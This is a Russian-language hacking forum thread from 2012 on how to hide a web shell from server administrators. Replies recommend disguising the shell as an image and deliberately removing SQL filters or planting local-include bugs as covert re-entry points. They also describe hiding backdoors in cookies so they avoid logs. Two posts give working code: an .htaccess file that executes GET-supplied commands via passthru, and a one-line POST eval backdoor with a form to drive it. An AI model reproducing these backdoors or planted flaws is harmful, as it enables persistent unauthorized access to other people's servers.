как спрятать веб шелл

Discussion in 'Песочница' started by seozone, 27 Sep 2012.

  1. seozone

    seozone Member

    Joined:
    11 Sep 2012
    Messages:
    30
    Likes Received:
    7
    Reputations:
    0
    такой вопрос, какие есть способы прятать шелл, чтобы админ его практически не мог найти на веб сервере?
     
  2. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    917
    Likes Received:
    492
    Reputations:
    724
    Под изображение, с соответствующим расширением.
     
    _________________________
  3. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    Как не прячь шел от грамотного админа он все равно его найдет, а вот если предусмотреть уязвимую функцию или подправить сценарий убрав в определённых местах кавычки и фильтры, то случай на восстановление сохранится!
     
    _________________________
  4. seozone

    seozone Member

    Joined:
    11 Sep 2012
    Messages:
    30
    Likes Received:
    7
    Reputations:
    0
    по подробнее разъясни
     
  5. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    убрать фильтрации в sql-запросах, поставить локальные инклуды, зарание найти лог с ошибками.
     
    _________________________
  6. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    like this:

    в родном варианте->
    if( file_exists('/etc/passwd') && is_writeable('/etc/passwd')) echo 'done!';

    и с поправкой на необязательность читаемости файла->
    if( file_exists('/etc/passwd') || is_writeable('/etc/passwd')) echo 'done!';

    В данном случае - подменя логического И на ИЛИ. Многоуважаемый Winstrool, как раз и имел ввиду подобные неявные методики.
     
  7. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    Проще спрятать бекдор, да не какой нибудь, а чтобы в логах при обращений не отображался.
    Да и после вставки самого бекдора, не забудьте изменить чмод и т.д.
     
  8. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    Не проще. Кое-кто говорил, что все гениальное просто. Не надо никаких наворотов. Почти все бекдоры, в силу своей явной функциональности, легко палятся как визуально, так и всяческим софтом. Конечно, есть нюансы, но в большинстве случаев живут дольше именно баги, а не бэкдоры.
     
    1 person likes this.
  9. tickhack

    tickhack New Member

    Joined:
    24 Jan 2012
    Messages:
    11
    Likes Received:
    4
    Reputations:
    -10
  10. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    ммм .. пока не разу не спалили мой бекдоры в куках а насчёт уязвимости, так она останется в логах
     
  11. mav1

    mav1 New Member

    Joined:
    27 Sep 2012
    Messages:
    22
    Likes Received:
    2
    Reputations:
    0
    можно спрятать в gif формате
    можно спрятать в .htaccess
    PHP:
    # Override default deny rule to make .htaccess file accessible over web <Files ~ "^\.ht"> Order allow,deny Allow from all </Files>  # Make .htaccess file be interpreted as php file. This occur after apache has interpreted # the apache directoves from the .htaccess file AddType application/x-httpd-php .htaccess  ###### SHELL ###### <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>###### LLEHS ######  domain/path/.htaccess?c=command 
     
  12. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    Как вариант можно вот это куда ни буть залепить:
    PHP:
    if (isset($_POST[id])) stripslashes($_POST[fun]($_POST[id]));
    а вот этим вызвать:
    PHP:
    <? $url="http://localhost.ru/shell.php"?> 
    <center><font color="DarkGreen">
    <b>Mini Shell v 0.1!</b> 
    <form action="<?=$url;?>" method = "post">
     <br> <table border=0 > <td> Message text:<br> 
    <input name="fun" type="text" Value="assert">:&nbsp;
    <input name="id" type="text" Value="phpinfo();">
     </td> </table> 
    <input type="submit" Value="Send!"> 
    </form> </center> 
    P.S: Если с толком подойти к вопросу, из этого мини шела такую конфетку можно забобахать! Уверен такими конфетками уже пользуются в тесных кругах).
     
    _________________________
    #12 winstrool, 3 Oct 2012
    Last edited: 3 Oct 2012
Loading...